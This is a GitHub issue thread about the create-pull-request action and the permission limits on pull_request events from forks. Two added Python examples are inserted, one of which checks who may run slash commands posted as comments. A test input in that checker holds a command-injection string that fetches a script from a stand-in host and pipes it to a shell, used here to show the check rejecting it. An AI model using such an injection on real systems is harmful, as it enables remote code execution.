Comments (8)
Yes, exactly. There are currently restrictions on events triggered by a pull request being opened from a fork. In fact, the restrictions are on any events triggered by a forked repository.
Restrictions on forked repositories
My understanding of the restrictions so far:
- Events from forks cannot access secrets, except for the default GITHUB_TOKEN. With the exception of GITHUB_TOKEN, secrets are not passed to the runner when a workflow is triggered from a forked repository.
- The GITHUB_TOKEN has read-only access when an event is triggered by a forked repository.
ref: https://help.github.com/en/actions/automating-your-workflow-with-github-actions/authenticating-with-the-github_token#permissions-for-the-github_token
There are a couple of posts on the community forums about this issue and with confirmation from GitHub staff that they are trying to implement a security model that would allow it.
https://github.community/t5/GitHub-Actions/Can-t-push-to-forked-repository-on-the-original-repository-s/m-p/35916/highlight/true#M2372
https://github.community/t5/GitHub-Actions/Github-Workflow-not-running-from-pull-request-from-forked/m-p/37990/highlight/true#M3180
What that means for create-pull-request action
Currently, if the event was triggered by a forked repository, it cannot commit changes because the GITHUB_TOKEN is read-only. I've not even tried to implement it, so it actually fails before then when it tries to checkout the head branch.
On the todo list:
- (done) Add better handling to catch this case and present an understandable message
- (done) Consider if the action should exit silently in this particular case
- Write something in the README as a general explanation of what to expect when using the action with pull request events
- Add the ability to open a PR against a fork in future if it becomes possible. (Although I'm not sure if this is a use case anyone would want)
I think the use cases for using create-pull-request action during an on: pull_request event are slim anyway. What happens during those events is this:
- The actions/checkout action by default checks out a merge commit between the head branch and the base.
- create-pull-request action can't do anything with that merge commit, so it scraps it and checks out the head branch instead. (This is where it fails currently if the PR was raised from a fork)
- If changes that were made on top of the merge commit before the action ran create a diff, the changes are committed to a new branch and a pull request raised with the base being the head branch of the original pull request, i.e. new-branch --> head_branch. Then the idea is that you would merge that new pull request into the first one before merging that.
The above all works fine for pull requests raised within a repository (non-fork PRs), but I think there are very few real use cases where you would want to do that kind of workflow.
The only other workflow I've seen work with on: pull_request and create-pull-request action is where the event is just being used to trigger the workflow for a completely different base. It doesn't make a lot of sense to do this because it's not really testing anything in the pull request, but it works. The following workflow is an example. It fixes the base to master by making sure it's checked out by actions/checkout before the changes are made, and then setting base: master on create-pull-request action.
```yaml
on:
  push:
    branches:
      - master
  pull_request:
    branches:
      - master
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v1
        with:
          ref: master
      - run: <something that creates a diff>
      - name: Create Pull Request
        uses: peter-evans/[email protected]
        with:
          token: ${{ secrets.GITHUB_TOKEN }}
          branch-suffix: none
          base: master
```
If in doubt I would advise just removing the pull_request event from a workflow that uses create-pull-request action.
from create-pull-request.
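The decision the comment above describes, worked through as an added Python example (this is not create-pull-request's own code): given GITHUB_REPOSITORY and a parsed pull_request event payload, it reports what actions/checkout hands the job (the merge ref), which branch the action would work on instead, whether GITHUB_TOKEN can push, whether other secrets are on the runner, and what base the new pull request would get. The Plan dataclass, plan_pull_request_run(), the repository names and the two payloads are all constructed for the example.

```python
"""Work out what a PR-creating action can do on an `on: pull_request` run.

Added example: this is not create-pull-request's own code. It encodes the
rules described above: actions/checkout gives the job a merge commit, the
action would instead work on the PR's head branch, a PR raised from a fork
runs with a read-only GITHUB_TOKEN and no other secrets, and for a same-repo
PR the new pull request is raised with the original PR's head as its base.
The event payloads are constructed for the example.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass
class Plan:
    from_fork: bool
    checkout_ref: str           # ref actions/checkout checks out by default
    work_ref: str               # branch the action switches to instead
    can_commit: bool            # False when GITHUB_TOKEN is read-only
    secrets_available: bool     # are non-GITHUB_TOKEN secrets on the runner?
    new_pr_base: Optional[str]  # base of the PR the action would raise
    reason: str


def plan_pull_request_run(repository: str, event: dict) -> Plan:
    """repository is GITHUB_REPOSITORY ("owner/name"); event is the parsed
    GITHUB_EVENT_PATH payload of a pull_request event."""
    pr = event["pull_request"]
    head = pr["head"]
    # For pull_request events GITHUB_REF points at the synthetic merge ref.
    merge_ref = f"refs/pull/{pr['number']}/merge"
    head_ref = head["ref"]
    # A PR comes from a fork when its head lives in a different repository.
    from_fork = head["repo"]["full_name"] != repository
    if from_fork:
        return Plan(
            from_fork=True, checkout_ref=merge_ref, work_ref=head_ref,
            can_commit=False, secrets_available=False, new_pr_base=None,
            reason="PR from a fork: GITHUB_TOKEN is read-only and other secrets "
                   "are withheld, so report success with a warning and do nothing",
        )
    return Plan(
        from_fork=False, checkout_ref=merge_ref, work_ref=head_ref,
        can_commit=True, secrets_available=True, new_pr_base=head_ref,
        reason=f"same-repo PR: commit the diff to a new branch and raise a PR "
               f"against {head_ref}",
    )


def _event(number: int, head_repo: str, head_ref: str) -> dict:
    """Constructed minimal pull_request payload (not a real webhook capture)."""
    return {"pull_request": {"number": number,
                             "head": {"ref": head_ref,
                                      "repo": {"full_name": head_repo}},
                             "base": {"ref": "master"}}}


SAME_REPO_EVENT = _event(12, "octo/widgets", "feature/lint")
FORK_EVENT = _event(13, "alice/widgets", "fix-typo")

if __name__ == "__main__":
    for ev in (SAME_REPO_EVENT, FORK_EVENT):
        print(plan_pull_request_run("octo/widgets", ev))
```

In a real workflow the same fork test is usually written as an `if:` condition on the step, comparing `github.event.pull_request.head.repo.full_name` with `github.repository`, so the push step never runs with a read-only token.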
I released a new version of the action today that gracefully handles pull request events triggered by forks. The action will report success but issue a warning that it couldn't handle the event.
from create-pull-request.
Hrmm so if I change the trigger to an issue comment for “chatops” will it change the scope of permissions?
I'm currently investigating the same idea as a workaround for some operations. I've not got a complete solution that I'm satisfied with yet, but what I have discovered is that the GITHUB_TOKEN can be used to commit in issue_comment events even when triggered by a user that doesn't have write access to the repository. I think the reason this is possible is because issue_comment events can only execute code that has been committed by users with write access to the repository. That differs from pull_request because users without write access could potentially inject code via the PR to be executed by the workflow.
So yes, I'm fairly sure the scope of permissions for issue_comment events will allow "chatops" without restrictions.
from create-pull-request.
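The flip side of the permission model described in the reply above is that on issue_comment events the token can write no matter who commented, so a "chatops" workflow has to decide for itself whether the commenter may run a command. The following added Python example (not slash-command-dispatch's code) gates a slash command from a parsed issue_comment payload: it acts only on pull request comments, trusts only commenters whose author_association implies write access (an assumption made here for simplicity; a stricter check would ask the collaborators API), allowlists command names, and confines arguments to a conservative character set so the comment body is never interpolated into a shell. TRUSTED_ASSOCIATIONS, ALLOWED_COMMANDS, dispatch(), Rejected and the payloads are names and data constructed for the example.

```python
"""Gate a ChatOps slash command delivered by an issue_comment event.

Added example; this is not slash-command-dispatch's code. On issue_comment
events the workflow runs code from the default branch and GITHUB_TOKEN can
write, so the decision that matters is who commented, not what was committed.
The commenter's role is read from the payload's author_association field
(assumed sufficient here; a stricter check would ask the collaborators API).
TRUSTED_ASSOCIATIONS, ALLOWED_COMMANDS, dispatch() and Rejected are names
chosen for this example, and the payloads are constructed, not captured.
"""
import re
import shlex
from typing import Optional

# Roles that imply write access to the repository; CONTRIBUTOR and NONE do not.
TRUSTED_ASSOCIATIONS = {"OWNER", "MEMBER", "COLLABORATOR"}
# Hypothetical allowlist: each command maps to a fixed workflow, never to a shell line.
ALLOWED_COMMANDS = {"deploy", "rebase", "test"}
_COMMAND_RE = re.compile(r"^/([a-z][a-z0-9-]*)(?:\s+(.*))?$")
_SAFE_ARG_RE = re.compile(r"^[A-Za-z0-9._/=-]+$")


class Rejected(Exception):
    """Raised when a command must not be dispatched; the message is the reason."""


def dispatch(event: dict) -> Optional[dict]:
    """Return {"command", "args", "pr_number", "actor"} for a command the
    commenter is allowed to run, or None if the comment is not a command."""
    comment = event["comment"]
    body = comment["body"].strip()
    first_line = body.splitlines()[0] if body else ""
    if not first_line.startswith("/"):
        return None
    # Only act on pull request comments: the field is absent for plain issues.
    if "pull_request" not in event["issue"]:
        raise Rejected("commands are only accepted on pull requests")
    assoc = comment.get("author_association", "NONE")
    if assoc not in TRUSTED_ASSOCIATIONS:
        raise Rejected(f"{comment['user']['login']} ({assoc}) may not run commands")
    m = _COMMAND_RE.match(first_line)
    if not m:
        raise Rejected("malformed command")
    name, rest = m.group(1), m.group(2) or ""
    if name not in ALLOWED_COMMANDS:
        raise Rejected(f"unknown command /{name}")
    try:
        args = shlex.split(rest)
    except ValueError as exc:
        raise Rejected(f"bad arguments: {exc}") from None
    # The body is attacker-controlled text: keep arguments to a conservative
    # charset so they travel as discrete values and are never handed to a shell.
    bad = [a for a in args if not _SAFE_ARG_RE.match(a)]
    if bad:
        raise Rejected(f"rejected argument(s): {bad}")
    return {"command": name, "args": args,
            "pr_number": event["issue"]["number"],
            "actor": comment["user"]["login"]}


def _comment_event(body: str, login: str, assoc: str, on_pr: bool = True) -> dict:
    """Constructed minimal issue_comment payload for the example."""
    issue = {"number": 42}
    if on_pr:
        issue["pull_request"] = {"url": "https://api.github.com/repos/octo/widgets/pulls/42"}
    return {"issue": issue,
            "comment": {"body": body, "author_association": assoc,
                        "user": {"login": login}}}


if __name__ == "__main__":
    for ev in (_comment_event("/deploy staging", "maintainer", "MEMBER"),
               _comment_event("/deploy prod", "driveby", "NONE"),
               _comment_event("/test $(curl evil.example|sh)", "maintainer", "OWNER")):
        try:
            print(dispatch(ev))
        except Rejected as exc:
            print("rejected:", exc)
```

The ordering is deliberate: the comment is classified as a command before any trust decision, the trust decision happens before any parsing of attacker-controlled text, and a rejected command raises rather than returning a value, so a caller cannot accidentally dispatch it.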
Yes, very soon I'm going to publish a ChatOps solution I've been working on.
from create-pull-request.
Thanks @peter-evans ! Your GitHub action is a “master class” in learning actions. That truly is a shame that we can’t use this action (or basically any action) on forks. As 99% of our projects are open source I am really struggling to accomplish many of the things I want to do. Hrmm so if I change the trigger to an issue comment for “chatops” will it change the scope of permissions?
from create-pull-request.
@peter-evans any conclusions? =)
from create-pull-request.
I've released an action called slash-command-dispatch that facilitates "ChatOps" with GitHub Actions.
There is a demo here that shows how this solution can be used to run workflows against pull requests.
from create-pull-request.
I've released v2, a major version update. As part of this release I've summarised the main gist of my explanation of this issue in a new document here.
There are no changes to the approach. My recommendation is to use slash-command-dispatch to perform operations on pull requests.
Closing this issue for now.
from create-pull-request.